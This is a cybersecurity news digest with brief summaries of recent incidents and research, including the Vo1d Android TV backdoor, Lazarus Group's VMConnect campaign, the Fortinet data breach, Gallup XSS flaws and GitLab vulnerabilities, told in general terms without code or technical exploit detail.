Threat actors have been infecting Internet-exposed Selenium Grid servers to use victims' Internet bandwidth for cryptomining, proxyjacking, and more. Wiz reports that 30 percent of cloud environments use Selenium, an open source suite of tools for browser automation. Millions of developers and thousands of organizations use Selenium Grid, an open source tool for automatically testing web applications across multiple platforms and browsers in parallel. Some hackers have launched automated malware to hijack Selenium Grid servers for malicious purposes.

Digitally manipulated "deepfake" photos and videos are getting increasingly harder to spot as Artificial Intelligence (AI) networks improve and become more accessible. New research led by Binghamton University breaks down images using frequency domain analysis techniques and identifies anomalies indicating that AI generated them. The study compared real and fake images. The researchers created thousands of images with Adobe Firefly, PIXLR, DALL-E, and other generative AI tools, then analyzed them using signal processing to understand their frequency domain features.

European Union regulators are investigating one of Google's Artificial Intelligence (AI) models due to concerns about its compliance with data privacy rules. Ireland's Data Protection Commission is looking into Google's Pathways Language Model 2 (PaLM2). It is part of a larger effort, including other national watchdogs across the 27-nation bloc, to delve into how AI systems handle personal data. This article continues to discuss Ireland's Data Protection Commission opening an inquiry into Google's PaLM2.

A new malware named "Vo1d" has infected about 1.3 million Android-based TV boxes running outdated operating systems and owned by users in 197 countries. The antivirus vendor Doctor Web described it as a backdoor that hides its components in the system storage area and, when commanded by attackers, secretly downloads and installs third-party software. Most infections are in Brazil, Morocco, Pakistan, Saudi Arabia, Argentina, Russia, Tunisia, Ecuador, Malaysia, Algeria, and Indonesia.

According to ReversingLabs, "Lazarus Group" is continuing its "VMConnect" campaign by distributing new malicious software packages to developers via open source repositories. The North Korean group masqueraded as Capital One employees and used fake job interviews to trick developers into downloading the malware. The malware installs malicious downloaders on developer systems that can fetch second and third-stage malware, such as backdoors and infostealers. This article continues to discuss findings regarding the continued VMConnect campaign.  

According to researchers at Check Point, hackers suspected of operating on behalf of the Iranian government have been targeting Iraqi government networks. Iran has been discovered to be conducting cyber espionage operations against various Iraqi entities, including the government. The attacks use custom malware and infrastructure designed for specific targets, with links to known threat actors previously associated with Iran's Ministry of Intelligence and Security (MOIS).

According to Endor Labs, about 95 percent of version upgrades of open source software include at least one breaking change that causes other components to fail. Patches have a 75 percent chance of causing a break. The problem of breaking changes is exacerbated by the finding that a quarter of vulnerable components require a major version update. This article continues to discuss key findings from Endor Labs' "Dependency Management Report."

Cybersecurity giant Fortinet has recently confirmed it suffered a data breach after a threat actor claimed to steal 440GB of files from the company's Microsoft Sharepoint server.  Fortinet is one of the largest cybersecurity companies in the world.  Early this morning, a threat actor posted to a hacking forum that they had stolen 440GB of data from Fortinet's Azure Sharepoint instance.  The threat actor then shared credentials to an alleged S3 bucket, where the stolen data is stored for other threat actors to download.

Checkmarx reports that Gallup fixed two Cross-Site Scripting (XSS) errors on its website that could have resulted in data theft and account takeovers. Gallup is known for its public opinion polls, including polls regarding US politics and elections. An attacker could have exploited the XSS flaws to trick victims into clicking links from the legitimate Gallup website that led to data extraction or session hijacking. This article continues to discuss the Gallup XSS errors and the impact these flaws could have had.  

GitLab has released critical updates for multiple vulnerabilities, one of which enables an attacker to trigger pipelines as arbitrary users under certain conditions. As part of GitLab's Continuous Integration/Continuous Delivery (CI/CD) system, the pipelines are automated workflows used in the building, testing, and deployment of code. They automate repetitive tasks and ensure codebase changes are tested and deployed consistently. The critical vulnerability can allow an attacker to execute environment stop actions as the owner of the stop action job.